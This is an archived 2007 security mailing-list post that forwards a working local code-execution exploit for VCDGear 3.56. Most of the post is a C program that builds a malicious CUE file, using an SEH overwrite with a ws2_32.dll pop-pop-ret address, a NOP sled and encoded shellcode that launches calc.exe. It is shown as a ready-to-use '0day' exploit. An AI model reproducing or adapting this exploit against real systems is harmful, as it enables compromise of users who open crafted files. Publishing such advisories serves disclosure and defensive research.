OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Re: VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit

From: str0ke (str0kemilw0rm.com)
Date: Sat Apr 14 2007 - 12:09:36 CDT


Original author: InTeL

http://www.milw0rm.com/exploits/3727

/str0ke

On 14 Apr 2007 11:49:22 -0000, meftunmeftunnet.com
<meftunmeftunnet.com> wrote:
> /* ~~~~~~~~~~~~~~0day~~~~~~~~~~~~~~~~~~
> Discovered by: C-W-M
> Auther: C-W-M ~ Www.MeftunNet.Com & Www.HackerSecurity.Org
> Location : Turkey...
> Attack Vector: SEH overwrite
> Type: Local
> Tested on Win2k SP4 (English)
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> Software: VCDGear v3.56 build 050213
> Website: www.vcdgear.com
> Description:
>
> "VCDGear is a program designed to allow a user to extract MPEG streams from CD images, convert VCD files to MPEG,
> correct MPEG errors, and more -- all in a single step. Initially developed back in late 1997, the program has
> grown to do various extractions, conversions, and corrections on the fly. Cross-platform support will allow
> different machines to process and generate output that is compatible between one another.
>
> Total Buf Size: 2512 - [Junk - 324][SEH overwrite - 8][NOP Sled and Shellcode room for - 2180]
>
> Greetz: Ekobar, Poizonb0X, eno7, Doublekickx #pen15
> */
>
> #include <stdlib.h>
> #include <stdio.h>
>
> // Exec Calc.exe Scode
> unsigned char scode[] =
> "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
> "\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
> "\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
> "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
> "\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
> "\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
> "\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
> "\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
> "\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
> "\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
> "\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
> "\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
> "\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
> "\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
> "\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
> "\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
> "\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
> "\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
> "\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
> "\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
> "\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";
>
>
> int main(int argc, char *argv[])
> {
> FILE *handle;
>
> if(argc < 2) {
> printf("0day VCDGear exploit\n");
> printf("Usage: %s <output CUE file>", argv[0]);
> return 0;
> }
>
> if(!(handle = fopen(argv[1], "w"))) {
> printf("[+] Error");
> return 0;
> }
>
> fputs("FILE \"", handle);
> for (int i=0;i<324;i++) \
> fputs("A", handle);
>
> fputs("\xeb\x32\x90\x90", handle);
> fputs("\x3a\x1f\x03\x75", handle); //pop edi, pop esi, retn in ws2_32.dll (English / 5.0.2195.6601)
> for (i=0;i<200;i++)
> fputs("\x90", handle);
>
> fputs((char *)scode, handle);
> fputs("\" BINARY\n", handle);
> fputs(" TRACK 01 MODE2/2352\n", handle);
> fputs(" INDEX 01 00:00:00\n", handle);
>
> fclose(handle);
>
> printf("[+] File successfully created");
>
> return 0;
> }
>